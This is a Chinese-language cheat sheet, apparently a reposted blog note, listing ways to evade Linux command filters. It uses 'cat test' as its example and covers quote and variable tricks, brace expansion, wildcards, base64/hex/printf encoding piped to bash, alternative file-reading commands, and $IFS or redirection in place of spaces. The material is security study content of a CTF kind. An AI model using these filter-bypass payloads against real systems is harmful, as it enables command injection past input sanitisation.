标签:字符 x74 cat 命令 st linux test 绕过 te
linux命令绕过
test文件里的内容是'hahaha'
利用空字符、空变量、转译符
ca''t test/cat te""st
cat te\st
ca$@t test (Linux中$[0-9]、$*、$!、$@表示参数)
a=at;b=c;d=st;e=te;$b$a $e$d(Linux中变量以英文字母,数字和下划线,首个字符不能以数字开头)
利用花括号
cat t{es,}t 花括号通过逗号分割构建序列并展开
cat {tes,t}{tes,t} 花括号可以表示两个序列的笛卡尔积
利用通配符
cat /te* *匹配任意长度的任意字符
cat /te?t ?匹配一个任意字符
cat /te[a-z] t 匹配[list]列表中的所有字符
cat /t[ ^a,b,c]st 匹配非列表[^list]中的所有字符
利用编码
以下编码都是(cat test)
echo Y2F0IHRlc3Q= | base64 -d | bash 打印 | 解码 | bash运行
echo 6361742074657374 | xxd -r -p|bash hex加密
$(printf "\x63\x61\x74\x20\x74\x65\x73\x74\x0a") 注意printf后面有一个空格
`printf "\x63\x61\x74\x20\x74\x65\x73\x74\x0a"` 反引号
cat命令绕过
cat test
tac test
more test
less test
head test
tail test (用tail -f 查看服务器日志,会不断检索文件有没有更新,实时把内容打印)
nl test
od test
rev test
空格绕过
利用重定向
cat<test
cat<>test
利用分割符
cat$IFStest
cat$IFS$9test
cat{$IFS}test
利用花括号
{cat,test}
标签:字符,x74,cat,命令,st,linux,test,绕过,te 来源: https://www.cnblogs.com/Jinx8823/p/16262990.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。